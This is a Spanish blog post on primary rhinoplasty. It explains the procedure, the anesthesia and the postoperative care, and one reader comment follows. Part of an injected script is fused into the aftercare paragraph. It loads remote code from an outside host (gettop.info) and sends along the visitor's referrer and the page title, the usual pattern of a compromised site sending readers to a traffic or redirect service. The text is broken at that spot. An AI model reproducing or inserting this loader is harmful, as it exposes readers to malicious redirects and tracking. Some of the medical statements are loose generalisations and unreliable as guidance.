Salud y belleza » Cirugía estética

Rinoplastia Primaria: metiendo las narices

1 Comentario

Marcel Proust escribió una vez que “para el beso, la nariz y los ojos están tan mal colocados como mal hechos los labios”. ¿Acaso se deberá a aquella razón el desmesurado crecimiento de la industria de la cirugía plástica de nariz o rinoplastia ?.

Seguramente no, existen muchas otras razones más cotidianas y menos poéticas para pensar las causas por las cuales, efectivamente, un sujeto decide  cambiar su nariz (quizás, para algunos, el orden es inverso al de Proust y piensan no en las comodidades del beso, sino en los requisitos previos necesarios para llegar a él: por algo Marcel fue un personaje influyente y, el resto, simplemente “otra cosa”).

En fin, lo cierto es que, por una causa u otra, las rinoplastias encabezan la lista de cirgugias plásticas junto con las operaciones relacionadas al aumento de mamas.

Se denomina Rinoplastia Primaria a esa intervención quirúrgica que se efectúa para corregir alteraciones o anormalidades anatómicas que afean el apéndice nasal. Estas alteraciones son generalmente deformidades que el paciente busca corregir por cuestiones esteticas básicas: nariz muy grande, desviación, orificios exagerados o punta del dorso nasal desmedida.

La rinoplastia primaria, a diferencia de otras, suele clasificarse como funcional y estética a la vez. Es importante destacar la utilización de procedimientos coordinados para reparar en un mismo acto quirúrgico las deformidades estéticas, como los desórdenes funcionales.

Sobre el procedimiento quirúrgico “per se”: si bien se puede efectuar en un quirófano con anestesia local, actualmente se suele hacerlo bajo anestesia general. Esto no solo disminuye los riesgos sino que también logra la rápida salida del centro asistencial del paciente. Las incisiones, que son pequeñas, se realizan en zonas discretas y, en consecuencia, las cicatrices son mínimas (además se van con el tiempo).

Vale aclarar una pregunta que suelen hacer muchos pacientes en potencia: si bien tanto un cirujano como un otorrinolaringólogo están, ambos, capacitados para realizar la parte estética y funcional de la nariz, este tipo de cirugías son realizadas por los dos profesionaes en conjunto atendiendo cada uno su parte.

Acerca de los cuidados postoperatorios, los mismos son similares a los que se deben mantener tras efectuar cualquier otro tipo de rinoplastia o intervención en la zona de la nariz. Hablamos de protección con yeso, tapones intranasales, analgésicos, antibióticos, vendajes por la zona, protección de los rayos solares y sumo cuidado en las tareas domésticas. Es muy importante evitar cualquier tipo de golpes, desde ya.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , , , ,

One Comment »

  • Juan Francisco said:

    Muy buena la nota. Gracias. Encontré información muy util

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.